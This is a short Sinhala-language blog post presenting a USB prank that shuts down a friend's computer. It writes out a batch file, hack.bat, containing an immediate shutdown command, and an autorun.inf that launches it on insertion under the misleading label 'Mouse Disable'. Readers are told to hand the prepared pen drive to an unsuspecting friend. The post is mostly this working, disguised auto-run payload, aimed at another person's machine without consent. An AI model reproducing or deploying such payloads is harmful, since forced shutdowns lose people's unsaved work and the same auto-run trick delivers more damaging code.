යාලුවගෙ Computer එක Pen එකකින් OFF කරමු.


ඔන්න මචන්ලා මම අද මේ Post එක ගෙනාවෙ ඔයගොල්ලොන්ට පොඩි ආතල් එකක් ගන්න. එහෙම කිවුවෙ මොකද දන්නවද?. මම ඔයගොලොන්ට යාලුවගෙ Computer එකට වඩේ දෙන්න පොඩි වැඩ කැල්ලක් ගෙනාව. අහ් අපි එහෙනම් වැඩේට බහිමුකෝ.

මුලින්ම මේ පල්ලයහින් තියෙන කෝඩ් ටික Notpad එකට Copy කරගන්නකො.

@echo off

shutdown -s -t 00


දැන් ඒක save කරගන්න කලින්  File එකේ  නමට hack.bat කිදෙන්න ඊපස්සෙ Save ගන්න.


දැන් අයෙත් අලුත් Notepad එකක් Open කරගෙන ඒකට  පහල තියෙන code ටික Copy කරගන්න.


[autorun]
Open=hack.bat
Action=Mouse Disable

දැන් ඕකත්  save කරන්න කලින් File Name එකට autorun.inf කි Save ගන්න.

දැන් ඔය Files දෙකම එක Pen එකකට copy කරගෙන යාලුවෙක්ට පෙන් එක දෙන්න. එතකොට වැඩේ  යාලුව පෙන් එක Computer එකට ගහපු ගමන් Pc එක Off වෙනව (බයවෙන්න එපා පරිගණකයට හානියක් සිදුවන්නේ නැත.)
Share on Google Plus

About Praneeth Madush

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.

0 comments:

Post a Comment